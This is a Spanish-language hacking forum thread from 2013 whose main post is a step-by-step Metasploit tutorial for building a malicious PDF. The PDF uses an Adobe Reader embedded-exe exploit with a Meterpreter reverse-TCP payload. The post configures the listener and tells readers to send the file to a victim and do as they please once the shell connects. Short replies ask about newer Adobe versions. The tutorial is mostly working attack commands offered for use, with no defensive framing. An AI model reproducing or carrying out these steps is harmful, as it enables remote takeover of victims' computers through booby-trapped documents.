elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Infectar archivo pdf
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Infectar archivo pdf  (Leído 7,324 veces)
aqqle

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Infectar archivo pdf
« en: 17 Abril 2013, 19:20 pm »

Muy buenas,
Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...

Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...

Crearemos una conexión de la víctima  a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...

Abriremos una terminal y tecleamos:
Código:
msfconsole  #quizá tengáis que usar sudo msfconsole...

Una vez cargado metasploit:
Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:
Código:
set FILENAME aqqle.pdf

Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Código:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Indicamos a metasploit el directorio de salida con:
Código:
set OUTPUTPATH /home/bugtraq/ 
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)
Código:
set LHOST 192.168.0.199
Indicamos el puerto...
Código:
set LPORT 4455
Y configuramos el S.O y versión de Adobe Reader:
Código:
set id 0

Ahora toca hacer el exploit...
Código:
exploit

Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Código:
back
Nos pondremos a la escucha usando:
Código:
use exploit/multi/handler
Le indicamos el PAYLOAD:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Vamos a indicarle nuestra ip así como el puerto a la escucha:
Código:
set LHOST 192.168.0.199
Código:
set LPORT 4455
Indicamos id=0:
Código:
set id 0

Finalmente...
Código:
exploit


Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!

Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..

Lo siento Sergi...   ;-)

Saludos!

. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Infectar archivo pdf
« Respuesta #1 en: 17 Abril 2013, 19:47 pm »

Estos tutoriales los has creado tu o son sacados de algun lado? estan buenos, por lo menos directos y sin vueltas ;)

Con las versiones nuevas de Adobe se pude hacer esto igualmente?
En línea

aqqle

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: Infectar archivo pdf
« Respuesta #2 en: 17 Abril 2013, 20:44 pm »

Mio 100%... y mi tiempo me he tirado con el tuto..

Con versiones actuales no funciona, lo pongo mas arriba.. De todas formas todavía es factible su uso.

Saludos
« Última modificación: 17 Abril 2013, 20:45 pm por aqqle » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Infectar archivos
Programación Visual Basic
APOKLIPTICO 1 1,820 Último mensaje 25 Octubre 2005, 15:21 pm
por Kizar
infectar exe's
Programación Visual Basic
cobra_90 2 1,618 Último mensaje 17 Septiembre 2006, 19:37 pm
por Gorky
Infectar por msn
Programación Visual Basic
krosty_ufc 6 3,123 Último mensaje 20 Septiembre 2007, 04:18 am
por krosty_ufc
Infectar archivo en ejecución
Análisis y Diseño de Malware
cin.get(); 4 3,280 Último mensaje 28 Noviembre 2013, 17:10 pm
por Vaagish
¿es cierto que un archivo de sonido mp3 puede infectar la computadora?
Seguridad
luis_74 9 5,711 Último mensaje 8 Marzo 2015, 17:34 pm
por vk496
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines